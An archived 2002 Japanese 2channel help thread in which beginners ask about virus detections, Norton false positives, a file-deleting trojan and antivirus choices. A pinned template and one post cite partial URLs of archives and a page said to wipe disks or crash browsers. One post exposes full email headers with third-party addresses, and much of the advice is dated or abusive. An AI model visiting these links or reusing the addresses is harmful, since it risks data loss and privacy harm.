668 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/12 07:59 ID:???
>>666

>>652とか。

669 :ひよこ名無しさん:02/07/12 08:05 ID:???
>>667-668
すみません、vbsというのがなんなのか
わからなかったので見てませんでした。
エムエクースしながらやってたので、一瞬焦りました。
とりあえず大丈夫みたいですね。

670 :ひよこ名無しさん:02/07/12 08:06 ID:???
>>669
ああ、MX経由か・・・ウイルスソフとかっておいで。

671 :ひよこ名無しさん:02/07/12 08:09 ID:???
>>669
全然問題ない。それよりかMXの方が問題

672 :ひよこ名無しさん:02/07/12 10:34 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh

673 :age:02/07/12 17:37 ID:???


674 :◆WINMEi3Y :02/07/12 18:00 ID:???
>>646
このあたり
http://homepage2.nifty.com/winfaq/w98/trouble.html#294

675 :ひよこ名無しさん:02/07/12 19:30 ID:???
あげ

676 :ひよこ名無しさん:02/07/12 21:36 ID:Fma3ET/W
聞いてください。今ウイルススキャンしたら
vbs.loveletter.verっていうウイルスが発見されました。
ノートンのメッセージによると修復できないらしいのです
どうすればいいのですか?・゚・(つД`)・゚・ワァァァァ

677 :ひよこ名無しさん:02/07/12 21:36 ID:???
>>676
お前、なんで4つ前の添付レス他読まないんですか?

678 :ひよこ名無しさん:02/07/12 21:39 ID:???
>>676
ウイルススレの488読んでコイ

679 :モウ!!:02/07/12 22:55 ID:QOwnZOxN
助けてください。
いきなり「VBS,LOVELetter,A]が検出されました
とかでてきたのです。
どうしたらよいでしょうか?


680 :ひよこ名無しさん:02/07/12 22:56 ID:???
>>679
直前のレス読みなはれ

681 :Hannibal ◆I3SznmHM :02/07/12 22:57 ID:???
>>679
お前さん惚けてるんか?
>>672の一番初めの方を10回読め

682 :モウ!!:02/07/12 23:00 ID:QOwnZOxN
ご認知ではないと思います。
ノートン先生を、起動させてみたら、「感染が見つかりました。」
ってでてきたんですよ

683 :ひよこ名無しさん:02/07/12 23:01 ID:???
>>682
だから、その488くらいを読んでみろ!

684 : ◆lfOfjFVA :02/07/12 23:03 ID:Gd/0FYJ3
Windows Meの場合

次のメッセージが画面上に表示されます。 このプログラムは、MS-DOS モード(リアル モード)で実行されるため、このバージョンのWindowsでは実行できません。
MS-DOS ウインドウでこのプログラムを実行する方法は次のとおりです:
プログラムのアイコンをマウスの右ボタンでクリックし、[プロパティ]をクリックし、[OK]をクリックして、表示されるダイアログで[はい]をクリックします。プログラムが再起動します。

または製造元に問い合わせて、更新されたバージョンを入手します。


[OK]をクリックします。

Windows Meの起動ディスクを使用し、フロッピーディスクから起動します。

コマンドプロンプト状態で、以下のコマンドを入力します。
  C:
  CD \VB
  VBSCAN /V /A /C

ウイルスチェックが開始されます。
発見された「PE_MTX.A」はただちに自動的に駆除が行われます。
ここでの処理は、お使いのハードディスクの容量やファイルの数などにより、数分から数時間を要します。

すべての処理が完了すると、画面表示の変化がなくなり、プロンプト状態に戻ります。
フロッピーディスクを抜き、コンピュータを再起動します。

以上により、PE_MTX.Aの駆除が完了です。

↑あまりよく分かりません。コマンドプロンプトってなんですか?詳しく教えて下さい。

685 :ひよこ名無しさん:02/07/12 23:31 ID:???
パソコンの電源入れた後数分すると急に電源が落ちるウイルスてありますか
win2000でログイン画面のまま数分放置すると電源が落ちているのですが

686 :ひよこ名無しさん:02/07/12 23:32 ID:???
>>685
何でもウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルス
ウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルス
ウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルス
ウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルス
ウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルス


のせいか。めでたいな。

687 :ひよこ名無しさん:02/07/12 23:34 ID:???
>>685
省電力の設定が短すぎるんでないの?

688 :ひよこ名無しさん:02/07/12 23:38 ID:???
>>省電力は変えてないと思います。
昨日から突然なりました。さっきから
電源落ちてはコンセント入れなおして
再起動なんてばっかりやってます。

689 :Hannibal ◆I3SznmHM :02/07/12 23:39 ID:???
>>684
MS-DOSモードの画面のこと。
アクセサリー→システムツールとかにある。
黒い画面が出て
 C:\>
と言うような表示が出ている状態。

690 :ひよこ名無しさん:02/07/12 23:44 ID:/PHdZ3GZ
携帯電話が感染ていうのはありますでしょうか?
チェーンメールで送られてきて下のカーソルが効かなくなってしまいました。

691 :ひよこ名無しさん:02/07/12 23:47 ID:???
>>690
電源切って、バッテリーはずして、もう一度やりなおしたら?

692 :684:02/07/12 23:57 ID:cgHAIvFX
>>689
   ∧_∧
  (;´Д`)<わかりました。ありがとうございます。    



693 :ひよこ名無しさん:02/07/13 00:02 ID:YrbvP6tW
KING-SIZE PIGっていうのに感染しちゃったみたいなんですけど
除去ツールとかあれば教えていただけないでしょうか。

694 :ひよこ名無しさん:02/07/13 00:05 ID:???
>>693
テンプレ読んでコイや

695 :646:02/07/13 00:11 ID:cd+882Rl
>>674
 ウイルスではなかったんですね…良かった。早速実行してみます。
  ありがとうございました!

696 :ひよこ名無しさん:02/07/13 00:12 ID:HKtdBILD
件名:Let's be friends
本文:なし
添付:Re_19.06.2002.scr
   Re_19.06.2002.txt
っていうメールが見知らぬ外人から送られてきたんだけど
ウイルスは検出されませんでした。
コレって何?

697 :ひよこ名無しさん:02/07/13 00:14 ID:???
>>696
捨ててしまえ

698 :◆WINMEi3Y :02/07/13 00:39 ID:???
>>696
オンラインスキャンで検出されませんでした、ってのだけは勘弁。
あれは添付ファイルのスキャンに制約があるから。

IEは5.5SP2以上に・・・

699 :ひよこ名無しさん:02/07/13 02:22 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

700 :ひよこ名無しさん:02/07/13 03:08 ID:???
そのノートンの誤作動のことなんですけど、
2ch見てて毎回警告文が出るたびに削除してるんですが、
いちいち警告文ださないためには
削除しないでおいたほうがいいんですかね?

701 :ひよこ名無しさん:02/07/13 03:10 ID:JhNx7vaM


702 :700:02/07/13 03:14 ID:???
(ノ゚o゚)ノ オシエテー(^o^)

703 :ひよこ名無しさん:02/07/13 07:07 ID:???
>>700
かちゅ等で見るようにして該当フォルダをノートンで除外設定
かちゅだとlogフォルダだね

704 :ひよこ名無しさん:02/07/13 09:22 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

705 :ひよこ名無しさん:02/07/13 09:46 ID:???
ウイルスでしょうか・・・?

706 :age:02/07/13 10:28 ID:???


707 :700:02/07/13 12:39 ID:???
>>703
今までIEで閲覧するのに不自由なかったので、
あえてかちゅは使ってませんでしたが、これを機会に使ってみようかと思います。
ありがとうございました!

708 :ひよこ名無しさん:02/07/13 14:44 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

709 :ひよこ名無しさん:02/07/13 17:33 ID:???
PE_ELKERN.Dというウイルスが検出されて検索したのですが ひっかかりませんでした
どんなウイルスか分かる方いらっしゃらないでしょうか?

710 :ひよこ名無しさん:02/07/13 18:56 ID:???
ウィルスや不正アクセスに対応するためにウィルス対策ソフトを購入しようと思い家電屋に見にいきましたが、
トレンドマイクロの「ウィルスバスター」とシマンテックの「Internet Security」のどちらにしようかと迷ってしまいました。
どちらが良いかアドバイスをいただけませんでしょうか。

711 :ひよこ名無しさん:02/07/13 18:58 ID:???
>>710
どっちでもいいよ。漏れはノートンだけどさ

712 :ひよこ名無しさん:02/07/13 22:22 ID:fZLbPrf+
WinMeでNIS2002使ってるんだけど、今日パソコン起動したらパーソナルファイヤ
ウォールのアイコンがタスクトレイから消えてました。
画面右下の、何かあったときデロンと飛び出す奴も消えてました。
デスクトップのアイコンは消えてなかったのでWクリックしてみましたが、起動し
てくれません。
あと、フォルダを開いたり等の操作もえらく反応が鈍くなってます。
どうにか立ち上がったアンチウィルスで完全スキャンしてみましたが、何も検出さ
れません。スキャンディスクをかけてみても異常なしです。再起動かけても症状は
同じです。
前回終了時にフリーズしたのでスイッチを切って強制終了してしまったことぐらい
しか身に覚えがありません。どうなってしまったのでしょうか?

713 :ひよこ名無しさん:02/07/13 22:34 ID:???
>>712
強制終了のせいでスタートアップ関連が死んだかな?
ちょっと良く分からんが。
クラスタスキャンで不良セクタ出来てない?

714 :ひよこ名無しさん:02/07/13 22:39 ID:fZLbPrf+
>713
レスありがとうございます。クラスタスキャンやってみます。

715 :ひよこ名無しさん:02/07/13 22:43 ID:h8+yUFOs
なんかファイルを実行したらファイル全削除されました・・・
どうすれば・・・
今はネットカフェです・・・

716 :ひよこ名無しさん:02/07/13 22:44 ID:???
>>715
何のファイルなのさ

717 :ひよこ名無しさん:02/07/13 22:45 ID:h8+yUFOs
>>716
ウイルス名がわからないんです・・・
ファイル名はマンキン.exe

718 :ひよこ名無しさん:02/07/13 22:47 ID:???
>>717
そりゃ終わった。もうどうにもならん。

719 :ひよこ名無しさん:02/07/13 22:47 ID:???
>>717
マンキン・・・じゃ、OS再インストールしかないね。

720 :ひよこ名無しさん:02/07/13 22:50 ID:h8+yUFOs
マジですか・・・
対策法は・・・
つーかウイルスバスターひっかかんないんですけど

721 :ひよこ名無しさん:02/07/13 22:56 ID:???
>>720
最初出回った時は警告出なかったけど
今はでるよ
データの更新してないんじゃないの

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELALL.F

722 :ひよこ名無しさん:02/07/13 22:57 ID:h8+yUFOs
結局なんていうウイルスなんですか?


723 :ひよこ名無しさん:02/07/13 22:58 ID:???
定義ファイルが古い

724 :ひよこ名無しさん:02/07/13 22:58 ID:???
>>722
誰?

725 :ひよこ名無しさん:02/07/13 22:59 ID:???
>>720
てーか、「ウイルス定義」の更新してたの?

726 :ひよこ名無しさん:02/07/13 22:59 ID:???
>>724
ID

727 :ひよこ名無しさん:02/07/13 23:00 ID:h8+yUFOs
>>723
>>725
してたと思ったんだけどなぁ・・・

728 :ひよこ名無しさん:02/07/13 23:03 ID:???
UFOの襲来か。
なるほど宇宙人のツラみたいに珍奇な質問をしやがる。

729 :ひよこ名無しさん:02/07/13 23:04 ID:h8+yUFOs
ボクハドウスレバイインデスカ
サイキドウハマダシテマセン
タスケテ
ニイタカタマノボレ
>>728

730 :ひよこ名無しさん:02/07/13 23:04 ID:???
>>727
つい最近のものだから

731 :ノートン大先生のマンキン.exeの分析結果:02/07/13 23:27 ID:???
ノートン大先生のマンキン.exeの分析結果
ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名
マンキン.exe
: 結果
: デベロッパーノートを参照してください。


デベロッパーノート
:
%s
Our automated system has performed an extensive analysis on the file(s)
that you have submitted and found no evidence of malicious code. If you
have additional evidence to suggest that a malicious program still resides
in the file that was submitted to us, please contact Symantec Technical
Support for assistance.

732 : ◆2METALsM :02/07/14 03:21 ID:???
シマンテックの自動応答システムでは、感染活動の有無を判断してるんではなかろか?
このスレのいくつか前でも、実行すると全消去のexeファイルがリンクされてたので送ったら、
結果は「悪意があるコードを見つけませんでした」とのこと。
単なるファイル削除プログラムは相手にしてくれないっぽい。
確かにウイルスではないので当然と言えば当然かも知らんですが。

733 :ひよこ名無しさん:02/07/14 03:25 ID:IJDNc31z
知り合いから「きみの名前で携帯電話にワケのわからない
メールが送られてきた」と連絡があったので、送ってないと返事をして
パソコンのメールをチェックするとWORM_KLEZ.Hが添付されている
メールが知らないアドレスとその知り合いのアドレスから届きました。
ウィルスバスターが反応してくれたので、すぐに削除しました。

詳しい方、今後の対策の知恵を貸して頂けませんか?
お願いします。



734 :ひよこ名無しさん:02/07/14 03:28 ID:???
>>733
定義ファイルを最新にしてスキャン汁

735 : ◆2METALsM :02/07/14 03:28 ID:???
>>733
あなたのメールアドレスを登録している人がKlezに感染して、
その人がKlezつきメールをばら撒いてる可能性が大。
要はFromを詐称されたわけです。

ウイルスバスターの定義ファイルを常に最新に保ち、定期的にスキャン。

736 :霞拳志郎:02/07/14 03:37 ID:dRikaBKM
クレズE(WORM_KLEZ.E)だな。ここで調べてみ。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.E
君のアドレスを知る誰かが感染して君のアドレス使ってその友人に送信した
かもしれない。とりあえず君のアドレスを知るもの全てに知らせておきなさい。

737 :ひよこ名無しさん:02/07/14 03:42 ID:IJDNc31z
>>734-735-736
どうもありがとうございました。



738 :霞拳志郎:02/07/14 03:43 ID:dRikaBKM
>>737
どういたしまして。

739 :712です。:02/07/14 10:03 ID:FcNnR3Ff
>713
セーフモードにしてスキャンしましたが、クラスタ異常なし。念のためにデフ
ラグして最適化の後、もう一度アンチウィルス(7/10更新)で完全スキャンし
ましたが、ウィルス検出されず。でも症状は改善されません。インストしてあ
るゲームなんかも一応立ち上がりますが非常に重くてプレイしづらいです。
あと、微妙にスレ違いなネタでした。スマソ。ウィルスの仕業と決まったわけ
でもないのですから。

740 :ひよこ名無しさん:02/07/14 10:11 ID:???
>739
ノートンシステムワークス自体がOSを不安定にしたり
OSを重くしたりすることがあることを知ってる?
一度アンインストールしてみては?

741 :712です。:02/07/14 10:30 ID:FcNnR3Ff
>740
レスありがとうございます。
システムワークスではなく、インターネットセキュリティ2002を入れて
ます。


742 :740:02/07/14 10:35 ID:???
>741
NSWでなくNISだったね。すまなかった
Norton先生は全般的に>740の傾向がある
アンチウィルスでウィルス反応が無いなら安心できるのでは?
再インストール時の再設定をする手間が面倒でなければ
一度アンインストールしてみては?

743 :712です。:02/07/14 10:47 ID:FcNnR3Ff
>742
なるほど、全般的にその傾向があるのですか。
今日は日曜ですから、じっくりアンインスト→再インストやってみます。
ありがとうございました。

744 :ひよこ名無しさん:02/07/14 11:47 ID:b++DOBr0
ある日、起動した途端に青いエラー画面が出て、何度やってもエラー画面になって起動すらできないので
セーフモードでMcAfee VirusScan for Windows 95 and Windows 98の機能を全て無効にして再起動したところ何の問題もなく起動できました。

後日McAfee VirusScanを有効にして起動してもまたエラー画面が出るのですが、どんな対処法があるのか、どなたかご教授おねがいします。

745 :ひよこ名無しさん:02/07/14 11:48 ID:???
>>744
マカフィーのアンインストール

746 :744:02/07/14 11:54 ID:???
ウイルススキャンができないのは痛いですとても

747 :ひよこ名無しさん:02/07/14 11:58 ID:???
>746
マフィーを切ると問題なく起動できるんでしょ
だったらマカフィーが原因と考えられる
マカフィーを一度アンインストールして、再起動して
マカフィーを再度インストールしてみてはどうでしょう

もし他の原因があると考えているなら
あなたのPCの環境、その問題が起きる直前にPCにしたことを全部書いてください。

748 :ひよこ名無しさん:02/07/14 11:59 ID:PFwxhzDh
質問です。
あるスレにVBS-LOVELETTERウィルスの中身を書いたヤシがいるのだが、
これは犯罪?ファイルにして実行しなければ無害らしいが、脳トンとかが誤作動するらしい。
削除依頼は出しておいたけど、通報した方がいいのかな?詳しい人の見解きぼんぬ。

749 :744:02/07/14 12:01 ID:???
わかりました、マカフィーを再インストールしてみます。
どうもありがとうございました。

750 :748:02/07/14 12:07 ID:???
少し前のレスで既出みたいですねスマソ。

751 :ひよこ名無しさん:02/07/14 15:19 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

752 :ひよこ名無しさん:02/07/14 17:02 ID:???
あげ

753 :ひよこ名無しさん:02/07/14 20:06 ID:???
age

754 :ひよこ名無しさん:02/07/14 20:32 ID:???


755 :ひよこ名無しさん:02/07/14 20:32 ID:???
 

756 :ひよこ名無しさん:02/07/14 20:46 ID:/FjklBQo
McAfee VirusScanってやつでウイルススキャンのアップデートしようとしたら
error getting checksum for file 'e:\ecompull|dl\VSC\JPN\UPDATES4203.EXE'
というのが状況の欄に出てきてアップデート出来ませんでした。解決策を教えていただけないでしょうか
よろしくお願いします。

757 :メルトダウン:02/07/14 20:55 ID:???
>>756 チェックサムが間違っているなら、ダウンロードのエラーだろう。
該当のファイルを消して、やり直しても同じか?

758 :ひよこ名無しさん:02/07/14 21:01 ID:???
>>756
McAfeeは非常に評判が悪いので、この際買い換えてはどうかと。

759 :ひよこ名無しさん:02/07/14 21:03 ID:???
>>756
>>758の言うとおりバカフィー使ってる人には買い替えをお勧めする

760 : :02/07/14 21:04 ID:g3RiK7eV

↓のアドレスを踏んでしまいました。
://dms100.org/worksucks
踏んだ後、ウイルスを仕込んだブラクラと教えてもらいましたが。
McAfeeスキャンしたけどハードディスク大丈夫でした。
ですが心配です。
このウイルスはどんな影響があり、駆除はどうすればよいでしょうか?

761 :ひよこ名無しさん:02/07/14 21:06 ID:???
>>760
インターネット一時ファイル削除。あとはウイルススキャン。
マカフィーなんて使うなよ。

762 :ひよこ名無しさん:02/07/14 21:06 ID:???
>>760
踏んだ直後にMcAfeeが反応してないのか?
本当に教えられた通りウイルスならMcAfeeが即座に反応するはずだが?
反応していればどんなウイルスを検出したか分かってるはずだが?
McAfeeで使ってるウイルスパターンの日付を書いてみろ。

763 :760:02/07/14 21:51 ID:g3RiK7eV
よく解らなかったのでトレンドMのオンラインスキャンで検索した結果
4つでてきました。

ウイルス ファイル
JS_WINDOWBOMB.E  C:\WINDOWSTENP…
JS_EXCEPTION.GEN  C:\WINDOWSTenp…
JS_SEEKER.W      C:\WINDOWSTenp…
JS_SEEKER.A      C:\WINDOWSremoveit.hte

すいません対策を教えていただければ助かります。
この4つのファイルの削除だけでよろしいでしょうか?




764 :760訂正:02/07/14 21:52 ID:g3RiK7eV
よく解らなかったのでトレンドMのオンラインスキャンで検索した結果
4つでてきました。

ウイルス            ファイル
JS_WINDOWBOMB.E  C:\WINDOWSTENP…
JS_EXCEPTION.GEN  C:\WINDOWSTenp…
JS_SEEKER.W      C:\WINDOWSTenp…
JS_SEEKER.A      C:\WINDOWSremoveit.hte

すいません対策を教えていただければ助かります。
この4つのファイルの削除だけでよろしいでしょうか?




765 :ひよこ名無しさん:02/07/14 21:55 ID:???
>>764
ウイルス対策ソフトを買え!オンラインは「目安」でしかない。
ウイルス対策せずにネットするなんて、アフォですよ!

766 :ひよこ名無しさん:02/07/14 21:55 ID:???
>>764
トレンドマイクロホームページにウイルスデータベースがあるから勝手に調べろ

767 :◆WINMEi3Y :02/07/14 22:01 ID:???
>>764
あなたが閲覧に使用したブラウザの種類や設定の内容、WidowsUpdate
しているかどうかなどによる。

768 :ひよこ名無しさん:02/07/14 22:04 ID:???
しかし、ホントに居るんだよな。ウイルス対策しないヤツ。>>760みたいに。
このスレ見るようになるまで、まさかそんなヤツがいるとは・・・。
1人2人くらいはそういうヴァカがいるかもしれないとは思ったけど、
まさかこんなに多いとはね。

非常識っつーか無責任っつーか、ヴァカだよヴァカ。

こういう馬鹿男・馬鹿女が、馬鹿女・馬鹿男とセクースしまくって子供ぽこぽこ産んでさ、
そうやって日本は馬鹿で埋め尽くされていくんだろうね。そう思うと鬱だよ・・・。

769 :ひよこ名無しさん:02/07/14 22:13 ID:???
>>768
どうした!?ここに逝くか?

夢・独り言
http://life.2ch.net/yume/

770 :ひよこ名無しさん:02/07/14 22:22 ID:???
>>769=>>760ですか、見え見えすぎて面白くないですな。

771 :ひよこ名無しさん:02/07/14 22:24 ID:???
>>770
違うんだけど・・・。

772 :ひよこ名無しさん:02/07/14 22:27 ID:???
じゃあ俺もその内の一人だな

773 :ひよこ名無しさん:02/07/14 22:27 ID:???
>>771
ジサクジエーンがバレた香具師に限ってそう書くよ(w

774 :ひよこ名無しさん:02/07/14 22:29 ID:???
>>773
全然、違うんだけど。何、深読みしてんだか?

775 :760:02/07/14 22:42 ID:g3RiK7eV
2chで罵倒は慣れていますし、今回も放置しようと思いましたが、
>>769さんの様に、見ず知らずの人に援護射撃をしてもらうと
あらためて2chも悪くないなと思ってしまいます。
まあ、768の意見にも一理あるので、
この機会にウイルス対策を検討します。

このレスも768にとってはジサクジエーンなのかなw

776 :hage:02/07/14 22:46 ID:???


777 :ひよこ名無しさん:02/07/14 23:29 ID:yxWeRqR1

セキュリティ板のどこかを踏んだら、ノートンがVBS.Freelink.B
ってやつを検出したと警告してきました。誤作動でしょうか?

とりあえずスキャンして当たれば削除しようとおもいます。

778 :ひよこ名無しさん:02/07/14 23:32 ID:???
>>777
激しく既出。このスレをよ〜〜〜く読みなおせ!

779 :ひよこ名無しさん:02/07/14 23:32 ID:???
>>777
上の方を読め!488あたりだ

780 :ひよこ名無しさん:02/07/14 23:39 ID:rUS5ylBv
送信者”news” 件名”congratulations”という添付ファイル付きの
メールを受信しました。プロパティを見たら

Return-Path: <takashima@bando-elec.co.jp>
Received: from smtp.asahi-it.com (smtp01.asahi-it.com [210.174.168.200])
Received: from Yijsbua (CBCba-185p121.ppp13.odn.ad.jp [218.46.77.121])
Message-Id: <200207140728.g6E7Swm86338@smtp.asahi-it.com>
From: news <news@petheart.co.jp>
Subject: Congratulations

これはウィルスメールでしょうか?
全然、しらないアドレスです。
Outlook で開封はしていませんが、プレビューしただけでも
ダメですか? お願いします!

781 :ひよこ名無しさん:02/07/14 23:40 ID:???
>>780
捨てろ!


782 :ひよこ名無しさん:02/07/14 23:42 ID:???
>>780
何故自分でチェックしないんだ?
他人のメアドまで晒して・・・削除依頼出しとけよ。

783 :ひよこ名無しさん:02/07/14 23:50 ID:4hKLWz1t
なんでもベスト店のアンチウイルスソフトで
AVG(Grisoft)[6]というのが一位になっているのですが、
本当にいいソフトなのでしょうか?
このスレを検索しても出てこないのですが。
ご存知の方、お使いの方、いらっしゃいましたら教えてください。
ちなみに現在はノートンアンチウイルスを使用しています。

784 :ひよこ名無しさん:02/07/14 23:53 ID:???
>>783
サーチエンジンで検索すれば一発で出てくる。

785 : ◆2METALsM :02/07/14 23:52 ID:???
>>783
別に乗り換えるほどのもんでもないと思いますが。

786 :ひよこ名無しさん:02/07/14 23:59 ID:nF14rOKW
Hotmailをブラウザで利用しています。
IE6.0、ノートンアンチウイルス(リアルタイムアップデート)を使用しています。
最近、
・メールのサイズが120k〜130kもあるのに添付ファイルがない
・タイトルが英文
・本文には何も書かれていない
というメールが頻繁に届きます。
何回か開いてしまいました。
システムの完全スキャンをしても何も感染してないそうですが、
あまりにも怪しいメールのため気になります。
ウイルスメールなのでしょうか?

787 :660:02/07/15 00:16 ID:???
>>664
オソレスですが・・・
駆除ツールがそのサイトのリンク先にあったので
ウィルス駆除できました(´Д⊂
本当にありがとうございました!!

788 :ひよこ名無しさん:02/07/15 00:25 ID:???
>>781
ウィルスでしょうか? 捨てます。ありがと!

>>782
本当に初心者なので送信者のメルアドさらしてたの知りませんでした。
自分で調べられないからココに来たんです。


789 :ひよこ名無しさん:02/07/15 00:26 ID:???
>>788
ここに「削除依頼」出しとけ。
ヘンなメール来ても知らんぞ!

削除依頼
http://kaba.2ch.net/saku/

790 :ひよこ名無しさん:02/07/15 00:49 ID:???
>>780
その情報だけでウィルスかどうかなんてわかりっこないが。

791 :ひよこ名無しさん:02/07/15 00:53 ID:nEoaFeyb
今、携帯からここを見ています…とうとう、ウィルス感染を
経験してしまいました。大ショックです。
パソコン歴がここ数ヶ月で、ネットサーフィンとメールの
やりとり位しかしていない私でも、何とかウィルス駆除できるでしょうか?
今、ウィルスチェックが終わって、1個の感染ファイルが
見付かりました。
ウィルス名は、VBS.Loveletter.A(;_;)… でした。修復できませんでしたとでています。どうしたらよいでしょうか?
教えてください(;_;)

792 :ひよこ名無しさん:02/07/15 00:55 ID:???
>>791
このスレの488を見れば、自分の愚かさに
気づくだろう

793 :ひよこ名無しさん:02/07/15 00:56 ID:???
>>786
> ・メールのサイズが120k〜130kもあるのに添付ファイルがない
添付ファイルの有無をどうやって確認してる?

・タイトルが英文
常識。

・本文には何も書かれていない
白い背景に白い文字で書いてあったりしないか?


794 :791:02/07/15 01:19 ID:RFhI3sG6
792さんの書き込みの通り、488読みました。
・・・・そうだったのですね、気が抜けました。
でも良かったです〜〜
ものすごく慌ててしまったので、携帯の方からいきなり
最新レスの方に飛んでしまったので過去ログ未読でした。
スミマセン!
安心したところで、仕事に戻ります。
792さん、どうもありがとうございました。

795 :786:02/07/15 01:22 ID:mO5N6krc
>>793
レスありがとうございます。

>> ・メールのサイズが120k〜130kもあるのに添付ファイルがない
>添付ファイルの有無をどうやって確認してる?
「添付ファイル : 〜〜〜 (〜k) 」
という表示がないことからです。

>・本文には何も書かれていない
>白い背景に白い文字で書いてあったりしないか?
「全てを選択」をしましたが何も書かれていません。
ソースを見たら
<SCRIPT>
<!--
function Filtered()
{
return 0
}
//-->
</SCRIPT>
<FONT></FONT>
<font color=#000000>
とだけ書かれていました。

796 :定説 マカヒーは馬鹿ヒー:02/07/15 02:17 ID:???
ノートン>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
バスター>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>クソースネクストバカフィー
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>ウイルス警備隊

797 :ひよこ名無しさん:02/07/15 06:35 ID:???
こいつもAGE

798 :ひよこ名無しさん:02/07/15 08:56 ID:DHbJYCTN
朝から海外エロサイト廻っていたら、さっき JS_EXCEPTION.GEN
(ホームや検索がエロサイトに飛ばされるやつ)にやられた、、
あ〜、ビックリしたなぁもう。
セキュリティ高なのにウィルスバスターがバチバチと凄いスピードで反応。
あまりの速さに隔離がちゃんと出来ない〜、、、アハハ。
それでも、たった2〜3秒だが、なんとか20個隔離、26個失敗!!(w
当然、ActiveXもJavaも切ってあるのに、こんなの初めてでした。
インターネットオプション開くと、ホームページのアドレス欄に
カーソルが走ってるし、、閉じると固まるし、、
まぁ、ファイルの削除で実害は無いと思うのだが、、
確かにJavaは切ってあったのに、、なんだか、気持ち悪ぃ〜です。


799 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/15 09:01 ID:???
>>798
>当然、ActiveXもJavaも切ってあるのに、こんなの初めてでした。

そのウイルス、JavaScriptなんだから上は全然対策になってないかと。


800 :798:02/07/15 09:23 ID:DHbJYCTN
、、、スミマセン。
そ、そうなんですか、、今までこんな事無かったもので。
正直、JavaScriptはJavaを切っていれば無効になると思っていました。
それで、あつかましいとは思うのですが、対策はどうすれば良いのですか?
そんなサイト見なきゃ良いに決っているのですけど、、、

801 :ひよこ名無しさん:02/07/15 11:46 ID:XRlLXNMA
Noron Internet Securityかウィルスバスターを買おうと
思っているのですが、
Nortonの方はウィルス定義の更新には、
お金がかかると聞いているのですが、
